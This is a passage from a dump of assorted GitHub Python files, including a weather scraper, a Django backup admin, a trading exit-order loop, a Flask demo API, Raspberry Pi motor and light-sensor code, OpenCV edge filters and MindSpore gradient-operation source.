use_1sample_U=use_1sample_U, complete=complete)\n mmd_value_temp = -1 * TEMP[0]\n mmd_std_temp = torch.sqrt(TEMP[1]+10**(-6))\n STAT_u = torch.div(mmd_value_temp, mmd_std_temp)\n # Initialize optimizer and Compute gradient\n optimizer_u.zero_grad()\n STAT_u.backward(retain_graph=True)\n # Update weights using gradient descent\n optimizer_u.step()\n\n # Compute test power of deep kernel based MMD\n S = torch.cat([x_test.cpu(), y_test.cpu()], 0).to(device)\n # S = MatConvert(S, device, dtype)\n N1 = len(x_test)\n N_per = 500\n alpha = 0.05\n # MMD-D\n dec, pvalue, _ = TST_MMD_u(model_u(S), N_per, N1, S, sigma, sigma0_u, ep, alpha, device, dtype, use_1sample_U=use_1sample_U, complete=complete)\n return dec\n\n\nclass ModelLatentF(torch.nn.Module):\n \"\"\"Latent space for both domains.\"\"\"\n def __init__(self, x_in, H, x_out):\n \"\"\"Init latent features.\"\"\"\n super(ModelLatentF, self).__init__()\n self.restored = False\n self.latent = torch.nn.Sequential(\n torch.nn.Linear(x_in, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, x_out, bias=True),\n )\n def forward(self, input):\n \"\"\"Forward the LeNet.\"\"\"\n fealant = self.latent(input)\n return fealant","repo_name":"sumahn/c2st","sub_path":"MMD/ts_tests/deep_mmd_not_image.py","file_name":"deep_mmd_not_image.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45720450858","text":"import requests\nimport urllib.request\nimport time\nimport csv\nfrom bs4 import BeautifulSoup\nimport sched, time\nfrom datetime import datetime\nfrom yoo_telegram import Notifier\nimport pygsheets\nfrom config import BOT_TOKEN, TELEGRAM_USER\n\n\nclient = Notifier(BOT_TOKEN)\ngc = pygsheets.authorize(\n service_file=\"keys/bratislava-weather-trends-b9b47037fa19.json\"\n)\nSECONDS = 60 * 60\n\n\ndef getData(sc):\n try:\n sh = gc.open(\"weather-data\")\n wks = sh.sheet1\n\n url = \"http://www.shmu.sk/sk/?page=59\"\n response = requests.get(url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n timeNow = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n for row in soup.findAll(\"table\")[0].find_all(\"tr\"):\n columns = row.find_all(\"td\")\n if columns[0].text not in (\n \"Bratislava - Mlynská Dolina\",\n \"Bratislava Koliba\",\n ):\n continue\n else:\n station = columns[0].text.strip()\n temperature = columns[1].text.strip().split(\" \")[0]\n wind_dir = columns[2].text.strip()\n wind_speed = columns[3].text.strip().split(\" \")[0]\n wind_gusts = columns[4].text.strip()\n pressure = columns[5].text.strip().split(\" \")[0]\n clouds = columns[6].text.strip()\n weather = columns[7].text.strip()\n\n wks.insert_rows(\n 1,\n number=1,\n values=[\n timeNow,\n station,\n temperature,\n wind_dir,\n wind_speed,\n wind_gusts,\n pressure,\n clouds,\n weather,\n ],\n inherit=False,\n )\n sc.enter(SECONDS, 1, getData, (sc,))\n except Exception as e:\n timeErr = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n e_msg = f\"{timeErr} - Bratislava weather - {str(e)}\"\n client.sendMessage(TELEGRAM_USER, e_msg)\n sc.enter(SECONDS, 1, getData, (sc,))\n\n\ndef main():\n s = sched.scheduler(time.time, time.sleep)\n try:\n s.enter(SECONDS, 1, getData, (s,))\n s.run()\n except Exception as e:\n timeErr = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n e_msg = f\"{timeErr} - Bratislava weather - {str(e)}\"\n client.sendMessage(TELEGRAM_USER, e_msg)\n \n\nif 
if __name__ == \"__main__\":\n    main()\n","repo_name":"williambrach/Bratislava-weather-trends","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71807499243","text":"class BasketballPlayer():\n    def __init__(self, team, first_name, last_name, height_cm, weight_kg, points, rebounds, assists, triple_doubles):\n        self.team = team\n        self.first_name = first_name\n        self.last_name = last_name\n        self.height_cm = height_cm\n        self.weight_kg = weight_kg\n        self.points = points\n        self.rebounds = rebounds\n        self.assists = assists\n        self.triple_doubles = triple_doubles\n\n\nprint(\"Build your own NBA team by adding your favorite players!\")\n\nnew_player = BasketballPlayer(\n    team=input(\"Enter player team: \"),\n    first_name=input(\"First name: \"),\n    last_name=input(\"Last name: \"),\n    height_cm=input(\"Height in centimeters: \"),\n    weight_kg=input(\"Weight in kilograms: \"),\n    points=input(\"Points: \"),\n    rebounds=input(\"Rebounds: \"),\n    assists=input(\"Assists: \"),\n    triple_doubles=input(\"Triple doubles: \")\n)\n\nwith open(\"player.txt\", \"w\") as player_file:\n    player_file.write(str(new_player.__dict__))\n\nprint(\"Player added!\")","repo_name":"jaxtothemax/PythonHomework_13","sub_path":"Add_Player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18856698610","text":"stack = []\n\ndef isEmpty():\n    if len(stack) == 0:\n        return True\n    else:\n        return False\n\ndef push(n):\n    stack.append(n)\n\ndef pop():\n    if isEmpty():\n        print(\"Stack is empty.\")\n    else:\n        stack.pop()\n\ndef display():\n    if isEmpty():\n        print(\"Stack is empty\")\n    else:\n        print(stack)\n\nwhile True:\n    choice = int(input(\"Make a choice (1: push, 2: pop, 3: display): \"))\n    if choice == 1:\n        num = int(input(\"Enter an element to push onto the stack: \"))\n        push(num)\n    elif choice == 2:\n        pop()\n    elif choice == 3:\n        display()","repo_name":"Advaitmenon1106/backup","sub_path":"Py/Data Structures in Python/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14476275797","text":"# -*- coding: utf-8 -*-\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.template.response import TemplateResponse\nfrom django.core.urlresolvers import reverse\nfrom django.conf.urls import patterns, url\nfrom django.shortcuts import redirect\nfrom django.contrib import admin\nfrom dbsnapshot import models\n\n\nclass ServerAdmin(admin.ModelAdmin):\n    list_display = (\n        'host', 'port', 'status', 'remote_status', 'remote_list_num',\n        'days', 'per_day', 'created', 'updated', 'actions_column', 'id',)\n    search_fields = ('host',)\n    list_filter = ('status', 'created', 'updated',)\n\n    def __init__(self, *args, **kwargs):\n        super(ServerAdmin, self).__init__(*args, **kwargs)\n        self._col_inst = None\n\n    def _get_link(self, title, view_name):\n        # render a bracketed HTML action link; the format string needs both a URL\n        # and a title, and allow_tags on actions_column lets the admin show markup\n        return '<a href=\"%s\">[%s]</a> ' % (\n            reverse('admin:%s' % view_name, args=(self._col_inst.pk,),\n                    current_app=self.admin_site.name),\n            unicode(title)\n        )\n\n    def actions_column(self, instance, actions=''):\n        self._col_inst = instance\n        actions += self._get_link(_('backup'), 'backup_view')\n        actions += self._get_link(_('clean'), 'clean_view')\n        actions += self._get_link(_('list of backups'), 'backup_list')\n        return actions\n\n    
actions_column.short_description = _('Actions')\n actions_column.allow_tags = True\n\n def _server_view(self, request, pk, template, extra_context=None):\n context = {\n 'server': models.Server.objects.get(pk=pk),\n 'app_label': models.Server._meta.app_label,\n 'verbose_name': unicode(models.Server._meta.verbose_name),\n }\n if extra_context is not None:\n context.update(extra_context)\n return TemplateResponse(\n request, 'dbsnapshot/admin/%s.html' % template, context,\n current_app=self.admin_site.name)\n\n def backup_view(self, request, pk):\n return self._server_view(request, pk, 'backup_view')\n\n def clean_view(self, request, pk):\n return self._server_view(request, pk, 'clean_view')\n\n def backup_list_view(self, request, pk):\n return self._server_view(request, pk, 'backup_list')\n\n def backup_delete_view(self, request, pk, filename):\n models.Server.objects.get(pk=pk).remote_delete(filename)\n return redirect(\n reverse(\n 'admin:backup_list', args=(pk,),\n current_app=self.admin_site.name\n )\n )\n\n def get_urls(self):\n urls = super(ServerAdmin, self).get_urls()\n\n admin_urls = patterns(\n '',\n url(\n r'^backup/(\\d+)/$',\n self.admin_site.admin_view(self.backup_view),\n name='backup_view'\n ),\n url(\n r'^backup/clean/(\\d+)/$',\n self.admin_site.admin_view(self.clean_view),\n name='clean_view'\n ),\n url(\n r'^backup/list/(\\d+)/$',\n self.admin_site.admin_view(self.backup_list_view),\n name='backup_list'\n ),\n url(\n r'^backup/delete/(\\d+)/(.*?)/$',\n self.admin_site.admin_view(self.backup_delete_view),\n name='backup_delete'\n ),\n )\n return admin_urls + urls\n\n\nclass BackupLogAdmin(admin.ModelAdmin):\n list_display = (\n 'server', 'method', 'start', 'end', 'elapsed',\n 'success', 'date', 'id',)\n date_hierarchy = 'date'\n search_fields = ('server__host',)\n list_filter = ('method', 'success', 'date',)\n\n def __init__(self, model, admin_site):\n super(BackupLogAdmin, self).__init__(model, admin_site)\n\n self.readonly_fields = [field.name for field in model._meta.fields]\n self.readonly_model = model\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return request.method != 'POST'\n\n\nadmin.site.register(models.Server, ServerAdmin)\nadmin.site.register(models.Log, BackupLogAdmin)\n","repo_name":"LPgenerator/django-db-snapshot","sub_path":"dbsnapshot/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"25417100294","text":"from angel_api import Angel\nimport datetime\nimport time\nimport os\nfrom django.core.wsgi import get_wsgi_application\nos.environ['DJANGO_SETTINGS_MODULE'] = 'TradeXpress.settings'\napplication = get_wsgi_application()\nfrom Intellitrade.models import *\n\ndef trail_sl(entry_price, ltp, sl, trade):\n if ltp >= entry_price + sl or trade.sl_to_entry:\n if not trade.sl_to_entry:\n trade.sl_to_entry = True\n trade.save()\n sl = 0\n return sl\n\ndef exitOrder():\n try:\n active_trades = TradeSignal.objects.filter(is_active=True)\n active_users = Trader.objects.filter(is_active=True)\n if active_users is not None and len(active_users) > 0:\n angel = Angel(active_users[0].email)\n if active_trades is not None and len(active_trades)>0:\n for trade in active_trades:\n symbol_token = trade.symbol_token\n ltp = angel.getLtp(symbol_token)\n entry_price = trade.entry_price\n sl = 
StopLoss.objects.get(nifty_symbol=trade.nifty_symbol).price\n target = Target.objects.get(nifty_symbol=trade.nifty_symbol).price\n # trail sl to entry if ltp is greater than entry by sl \n sl = trail_sl(entry_price, ltp, sl, trade)\n if ltp >= entry_price + target or ltp <= entry_price - sl:\n trade.exit_price = ltp\n trade.exit_datetime = datetime.datetime.now()\n trade.save()\n for user in active_users:\n angel = Angel(user.email, trade)\n angel.exitOrder(ltp)\n except Exception as e:\n pass\n\nif __name__ == '__main__':\n while True:\n exitOrder()\n time.sleep(1)\n","repo_name":"gummadidala/tradeserver","sub_path":"TradeXpress/exit_order.py","file_name":"exit_order.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18675820245","text":"from flask import Flask, request\nimport operations\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return \"Hello World\"\n\n@app.route('/sum', methods=['GET','POST'])\ndef sumCalculate():\n value_a=request.args.get('value_a')\n value_b=request.args.get('value_b')\n sum=operations.sum(value_a,value_b)\n return str(sum)\n\n@app.route('/queryparams',methods=['GET'])\ndef paramsDemo():\n name=request.args.get('name')\n return name\n\n@app.route('/postparams', methods=['POST'])\ndef postParamsDemo():\n params=request.json\n value_a=params[\"value_a\"]\n value_b=params[\"value_b\"]\n sum=operations.sum(value_a,value_b)\n return str(sum)\n\nif __name__=='__main__':\n app.run()","repo_name":"avirup171/Python-IoT","sub_path":"rest-api-server-flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25220770549","text":"#!/usr/bin/env python3\n'''Module.\n'''\n\n\ndef update_topics(mongo_collection, name, topics):\n '''Function that changes all topics of a collection's document based on\n the name.\n '''\n mongo_collection.update_many(\n {'name': name},\n {'$set': {'topics': topics}}\n )\n","repo_name":"MosesSoftEng/alx-backend-storage","sub_path":"0x01-NoSQL/10-update_topics.py","file_name":"10-update_topics.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"15159845054","text":"import requests\nimport json\n\n\ndef test_mikoservletpoc():\n url = 'http://miko3-aks-agic.miko2.co.in/mikoservletpoc/miko-servlet-poc/recommendation2'\n files = {'file': open('C://Users//basav//PycharmProjects//ApiIntegration_MIko//Testcases//test_miko-servlet-poc'\n '//servalet-poc data//withoutslot.txt', 'rb')}\n\n m = requests.get(url, files=files,)\n print(m.status_code)\n print(m.text)\n assert m.status_code == 200\n","repo_name":"basava761/miko_API","sub_path":"test_miko-servlet-poc/servalet-poc data/test_servaletpoc.py","file_name":"test_servaletpoc.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31086721739","text":"from setuptools import find_packages\nfrom setuptools import setup\n\nwith open('README.md') as readme_file:\n readme = readme_file.read()\n\nrequirements = [\n 'Cython==0.29.13',\n 'Flask==1.1.1',\n 'flask-cors==3.0.8',\n 'gensim==3.8.0',\n 'lexrank==0.1.0',\n 'matplotlib==3.1.1',\n 'nltk==3.4.5',\n 'nose==1.3.7',\n 'numpy==1.17.2',\n 'pandas==0.25.1',\n 'scikit-learn==0.21.3',\n 'seaborn==0.9.0',\n 
'spacy==2.1.8',\n    'swifter==0.295',\n    'tqdm==4.35.0',\n    'wheel'\n    ]\n\n\nsetup(\n\n    author=\"teddyauthors\",\n    author_email='teddyauthors@gmail.com',\n    classifiers=[\n        'Development Status :: 2 - Pre-Alpha',\n        'License :: OSI Approved :: Apache Software License',\n        'Natural Language :: English',\n        'Programming Language :: Python :: 3.6',\n    ],\n    description=\"\",\n    install_requires=requirements,\n    license=\"Apache Software License 2.0\",\n    long_description=readme + '\\n\\n',\n    include_package_data=True,\n    name='Teddy',\n    packages=find_packages(),\n    setup_requires=requirements,\n    test_suite='tests',\n    tests_require=requirements,\n    version='0.1.0',\n    zip_safe=False,\n)\n","repo_name":"megagonlabs/teddy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"19"} +{"seq_id":"37694582919","text":"import time\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\n\npin_coilA1 = 10\npin_coilA2 = 27\npin_coilB1 = 17\npin_coilB2 = 22\nLDR_PIN = 23\n\ndef motorSetup():\n    GPIO.setup(pin_coilA1, GPIO.OUT)\n    GPIO.setup(pin_coilA2, GPIO.OUT)\n    GPIO.setup(pin_coilB1, GPIO.OUT)\n    GPIO.setup(pin_coilB2, GPIO.OUT)\n\ndef motorFree():\n    motorStep(0, 0, 0, 0)\n\ndef motorMove(steps, delay):\n    if steps >= 0:\n        for i in range(0, steps):\n            motorStep(1, 0, 1, 0)\n            time.sleep(delay)\n            motorStep(0, 1, 1, 0)\n            time.sleep(delay)\n            motorStep(0, 1, 0, 1)\n            time.sleep(delay)\n            motorStep(1, 0, 0, 1)\n            time.sleep(delay)\n    else:\n        for i in range(0, -steps):\n            motorStep(1, 0, 1, 0)\n            time.sleep(delay)\n            motorStep(1, 0, 0, 1)\n            time.sleep(delay)\n            motorStep(0, 1, 0, 1)\n            time.sleep(delay)\n            motorStep(0, 1, 1, 0)\n            time.sleep(delay)\n\ndef motorStep(a1, a2, b1, b2):\n    GPIO.output(pin_coilA1, a1)\n    GPIO.output(pin_coilA2, a2)\n    GPIO.output(pin_coilB1, b1)\n    GPIO.output(pin_coilB2, b2)\n\ndef ldr_value():\n    # RC-timing light measurement: drain the capacitor, then time how long it\n    # takes to charge back up through the LDR. Bright light means low LDR\n    # resistance and therefore a short duration.\n    value = 0\n    GPIO.setup(LDR_PIN, GPIO.OUT)\n    GPIO.output(LDR_PIN, GPIO.LOW)  # drive the pin low to discharge the capacitor\n    time.sleep(0.1)\n    start = time.time()\n    GPIO.setup(LDR_PIN, GPIO.IN)\n    while (GPIO.input(LDR_PIN) == GPIO.LOW):\n        value += 1  # busy-wait until the pin reads HIGH\n    finish = time.time()\n    duration = 1000 * (finish - start)  # charge time in milliseconds\n    return duration\n\nlightLevel = float(input(\"Desired light level: \"))\n\nmotorSetup()\nmotorFree()\n\nmotorPosition = 64\n\ntry:\n    while True:\n        motorAdjust = 0\n        ldr_val = ldr_value()\n        print(\"LDR: %s\" % ldr_val)\n        if ldr_val < lightLevel - 1:\n            if motorPosition < 128:\n                motorAdjust = 8\n                motorPosition += motorAdjust\n                print(\"Too bright, adjusting motor to %s\" % motorPosition)\n        elif ldr_val > lightLevel + 1:\n            if motorPosition > 0:\n                motorAdjust = -8\n                motorPosition += motorAdjust\n                print(\"Too dim, adjusting motor to %s\" % motorPosition)\n        else:\n            print(\"Just right\")\n        if motorAdjust != 0:\n            motorMove(motorAdjust, 0.01)  # step the motor; the 0.01 s per half-step delay is an assumed value\n        if motorAdjust == 0:\n            time.sleep(0.25)\nexcept KeyboardInterrupt:\n    pass\n\nGPIO.cleanup()\n\n","repo_name":"epic709/thinkerersA01","sub_path":"code/step_light.py","file_name":"step_light.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43353476907","text":"from django.db import models\nfrom Accounts.models import User\nfrom os import path,remove\nfrom cloudX.settings import MEDIA_ROOT\nfrom cloudX.settings import domain\n\n_types = [\n    ('sports','Sports'),\n    ('tech','Technical'),\n    ('cultural','Cultural'),\n    ('other','Other'),\n]\n\n# Create your models here.\n\nclass Data(models.Model):\n    title = models.CharField(max_length=225)\n    user = models.ForeignKey(to 
= User,on_delete=models.CASCADE)\n description = models.TextField(null=True,blank=True)\n link = models.TextField(null=True,blank=True)\n type = models.CharField(max_length=10,choices=_types)\n file = models.FileField(upload_to='data/')\n date = models.DateField()\n \n def extension(self):\n name, extension = path.splitext(self.file.name)\n return extension\n \n def delete(self, *args, **kwargs):\n remove(path.join(MEDIA_ROOT, self.file.name))\n super(Data,self).delete(*args,**kwargs)\n","repo_name":"KhushalJangid/cloudX","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72047330922","text":"#!/usr/bin/python3\n\nimport cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nwhile cap.isOpened():\n\t_ , img = cap.read()\n\tgray = cv2.cvtColor(img , cv2.COLOR_BGR2GRAY)\n\n# LAPLACIAN 2nd argument is datatype 64 float , 3rd argument is kernel size , it is optional\n\tlap = cv2.Laplacian(gray , cv2.CV_64F , ksize=5)\n\t\n# SobelX 2nd arg is datatype 64 float 3rd is value of dx and 4th is dy\n\tsobelX = cv2.Sobel(gray , cv2.CV_64F , 1 ,0)\n\tsobelX = np.uint8(np.absolute(sobelX))\n\n# SObelY\n\tsobelY = cv2.Sobel(gray , cv2.CV_64F , 0 ,1)\n\tsobelY = np.uint8(np.absolute(sobelY))\n\n# Sobel Combined\n\tsobel_com = cv2.bitwise_or(sobelX ,sobelY)\n# Converting into Uint8\n\tlap = np.uint8(np.absolute(lap))\n\t\t\n\tcv2.imshow('laplacian', lap)\n\tcv2.imshow('SobelX', sobelX)\n\tcv2.imshow('Sobel_Y', sobelY)\n\tcv2.imshow('Sobel_Com', sobel_com)\n\tcv2.imshow('Gray', gray)\n#image = [img,dst,blur,gblur,median,bilateral]\n\tif cv2.waitKey(1) == ord('q'):\n\t\tbreak\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"crashoverloaded/Opencv_Days","sub_path":"Day5/image_gradients.py","file_name":"image_gradients.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5447584398","text":"import matplotlib.pyplot as plt\r\nfrom mpl_toolkits.axes_grid1 import host_subplot\r\n\r\n# plot drawing & update\r\ndef draw_plot(data):\r\n\r\n print(type(data))\r\n for r in data:\r\n for k in r:\r\n print(k)\r\n\r\n plt.style.use('dark_background')\r\n\r\n host = host_subplot(111)\r\n\r\n par = host.twinx()\r\n\r\n host.set_ylabel(\"Temp.\", c=\"red\")\r\n par.set_ylabel(\"Pulse\", c=\"blue\")\r\n host.spines['left'].set_color(\"red\")\r\n par.spines['right'].set_color(\"blue\")\r\n\r\n y_temp = []\r\n y_pulse = []\r\n x = []\r\n x_ticks = []\r\n i = 0\r\n\r\n for r in data:\r\n print(r[5])\r\n y_temp.append(r[5])\r\n print(r[6])\r\n y_pulse.append(r[6])\r\n x.append(i)\r\n i += 1\r\n record = \"day \" + str(r[3]) + \", \" + str(r[2])\r\n x_ticks.append(record)\r\n\r\n plt.xticks(x, x_ticks, rotation=10)\r\n\r\n print(y_temp)\r\n print(y_pulse)\r\n p1 = host.scatter(x, y_temp, c=\"red\", label=\"Temp.\")\r\n p2 = par.scatter(x, y_pulse, c=\"blue\", label=\"Pulse\")\r\n\r\n return x_ticks\r\n\r\n","repo_name":"KonradHolewka/Hospi_App","sub_path":"plotdraw.py","file_name":"plotdraw.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22684848844","text":"from __future__ import absolute_import\nfrom functools import partial\n\nfrom types import FunctionType, MethodType\nimport mindspore as ms\nfrom mindspore import context\nfrom mindspore.common.parameter import 
Parameter, ParameterTuple\nfrom mindspore.parallel._utils import _grads_divided_by_device_num_if_recomputation\nfrom mindspore._c_expression import GradOperation_, HyperMap_, Map_, MultitypeFuncGraph_, Tail_, \\\n TupleAdd_, UnpackCall_, ZipOperation_, ListAppend_, TupleGetItemTensor_, ListInsert_, \\\n SequenceSliceGetItem_, ListSliceSetItem_, VmapOperation_, TaylorOperation_, ListPop_, \\\n ListClear_, ListReverse_, ListExtend_, DictClear_, DictHasKey_, DictUpdate_, DictFromKeys_, \\\n ZerosLike_, TensorIndexGetitem_, TensorIndexSetitem_, ListAdd_\nfrom mindspore.common import dtype as mstype\nfrom mindspore.common.api import jit, _pynative_executor, _wrap_func\nfrom mindspore.common.api import _add_flags, _core\nfrom mindspore.ops.primitive import Primitive\nfrom mindspore.ops import signature as sig\n\n__all__ = [TupleAdd_, ListAdd_, UnpackCall_, TupleGetItemTensor_, SequenceSliceGetItem_,\n ListSliceSetItem_, ZerosLike_, TensorIndexGetitem_, TensorIndexSetitem_]\n\n\ndef add_flags(fn=None, **flags):\n \"\"\"\n A decorator that adds a flag to the function.\n\n Note:\n Only supports bool value.\n\n Args:\n fn (Function): Function or cell to add flag. Default: ``None`` .\n flags (dict): Flags use kwargs. Default: ``None`` .\n\n Returns:\n Function, the function with added flags.\n\n Examples:\n >>> net = Net();\n >>> net = add_flags(net, predit=True)\n >>> print(hasattr(net, '_func_graph_flags'))\n True\n \"\"\"\n\n return _add_flags(fn, **flags)\n\n\ndef core(fn=None, **flags):\n \"\"\"\n A decorator that adds a flag to the function.\n\n By default, the function is marked as True, enabling to use this decorator to\n set flag to a graph.\n\n Args:\n fn (Function, optional): Function to add flag. Default: ``None`` .\n flags (dict, optional): The following flags can be set core, which indicates that this is a core function or\n other flag. Default: ``None`` .\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> net = Net()\n >>> net = core(net, predit=True)\n >>> print(hasattr(net, '_func_graph_flags'))\n True\n \"\"\"\n\n return _core(fn, **flags)\n\n\ndef _get_grad_weights_id(weights=None):\n \"\"\"generate id of parameters\"\"\"\n res = \"\"\n if isinstance(weights, Parameter):\n res = weights.name + str(weights.requires_grad)\n if isinstance(weights, ParameterTuple):\n res = ''.join(item.name + str(item.requires_grad) for item in weights)\n if isinstance(weights, list):\n res = ''.join(item.name + str(item.requires_grad) for item in weights if isinstance(item, Parameter))\n return res\n\n\nclass GradOperation(GradOperation_):\n \"\"\"\n A higher-order function which is used to generate the gradient function for the input function.\n\n The gradient function generated by `GradOperation` higher-order function can be customized by\n construction arguments.\n\n For example, given an input function `net = Net()` that takes `x` and `y` as inputs, and has a parameter `z`,\n see `Net` in Examples.\n\n - Used to get the derivative of the input:\n\n 1. Returns gradients with respect to the first input (see `GradNetWrtX` in Examples).\n\n 1) Construct a `GradOperation` higher-order function with default arguments: `grad_op = GradOperation()`.\n\n 2) Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 3) Call the gradient function with input function's inputs to get the gradients with respect to the first\n input: `grad_op(net)(x, y)`.\n\n 2. 
Returns gradients with respect to all inputs (see `GradNetWrtXY` in Examples).\n\n 1) Construct a `GradOperation` higher-order function with `get_all=True` which indicates getting gradients\n with respect to all inputs, they are `x` and `y` in example function `Net()`:\n `grad_op = GradOperation(get_all=True)`.\n\n 2) Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 3) Call the gradient function with input function's inputs to get the gradients with respect to all inputs:\n `gradient_function(x, y)`.\n\n - Used to get the derivative of the parameters:\n\n Returns gradients with respect to given parameters (see `GradNetWithWrtParams` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_by_list=True`:\n `grad_op = GradOperation(get_by_list=True)`.\n\n 2. Construct a `ParameterTuple` that will be passed to the input function when constructing\n `GradOperation` higher-order function, it will be used as a parameter filter that determine\n which gradient to return: `params = ParameterTuple(net.trainable_params())`.\n\n 3. Call it with input function and `params` as arguments to get the gradient function:\n `gradient_function = grad_op(net, params)`.\n\n 4. Call the gradient function with input function's inputs to get the gradients with\n respect to given parameters: `gradient_function(x, y)`.\n\n - Used to get the derivative of the inputs and parameters at the same time:\n Returns gradients with respect to all inputs and given parameters in the format of ((dx, dy), (dz))\n (see `GradNetWrtInputsAndParams` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_all=True` and `get_by_list=True`:\n `grad_op = GradOperation(get_all=True, get_by_list=True)`.\n\n 2. Construct a `ParameterTuple` that will be passed along input function when constructing\n `GradOperation` higher-order function: `params = ParameterTuple(net.trainable_params())`.\n\n 3. Call it with input function and `params` as arguments to get the gradient function:\n `gradient_function = grad_op(net, params)`.\n\n 4. Call the gradient function with input function's inputs to get the gradients with respect to\n all inputs and given parameters: `gradient_function(x, y)`.\n\n - We can configure the sensitivity(gradient with respect to output) by setting `sens_param` as True and\n passing an extra sensitivity input to the gradient function, the sensitivity input should has the\n same shape and type with input function's output(see `GradNetWrtXYWithSensParam` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_all=True` and `sens_param=True`:\n `grad_op = GradOperation(get_all=True, sens_param=True)`.\n\n 2. Define `grad_wrt_output` as `sens_param` which works as the gradient with respect to output:\n `grad_wrt_output = Tensor(np.ones([2, 2]).astype(np.float32))`.\n\n 3. Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 4. Call the gradient function with input function's inputs and `sens_param` to\n get the gradients with respect to all inputs: `gradient_function(x, y, grad_wrt_output)`.\n\n Note:\n For above gradient functions, the returned gradient result may vary for grad result element number:\n\n - Return a single value if only one result.\n - Return a tuple for multiple results.\n - Return an empty tuple for no result.\n\n Args:\n get_all (bool): If ``True`` , get all the gradients with respect to inputs. 
Default: ``False`` .\n get_by_list (bool): If ``True`` , get all the gradients with respect to Parameter free variables.\n If get_all and get_by_list are both ``False`` , get the gradient with respect to first input.\n If get_all and get_by_list are both ``True`` , get the gradients with respect to inputs and\n Parameter free variables at the same time in the form of (\"gradients with respect to inputs\",\n \"gradients with respect to parameter free variables\"). Default: ``False`` .\n sens_param (bool): Whether to append sensitivity (gradient with respect to output) as input.\n If sens_param is ``False`` , a 'ones_like(outputs)' sensitivity will be attached automatically.\n Default: ``False`` .\n If the sensor_param is ``True`` , a sensitivity (gradient with respect to output) needs to be transferred\n through the location parameter or key-value pair parameter. If the value is transferred through\n the key-value pair parameter, the key must be sens.\n\n Returns:\n The higher-order function which takes a function as argument and returns gradient function for it.\n\n Raises:\n TypeError: If `get_all`, `get_by_list` or `sens_param` is not a bool.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> import mindspore\n >>> import numpy as np\n >>> from mindspore import dtype as mstype\n >>> from mindspore import Tensor, ops, nn, Parameter\n >>> class Net(nn.Cell):\n ... def __init__(self):\n ... super(Net, self).__init__()\n ... self.matmul = ops.MatMul()\n ... self.z = Parameter(Tensor(np.array([1.0], np.float32)), name='z')\n ... def construct(self, x, y):\n ... x = x * self.z\n ... out = self.matmul(x, y)\n ... return out\n ...\n >>> class GradNetWrtX(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtX, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation()\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y)\n ...\n >>> x = Tensor([[0.5, 0.6, 0.4], [1.2, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.01, 0.3, 1.1], [0.1, 0.2, 1.3], [2.1, 1.2, 3.3]], dtype=mstype.float32)\n >>> output = GradNetWrtX(Net())(x, y)\n >>> print(output)\n [[1.4100001 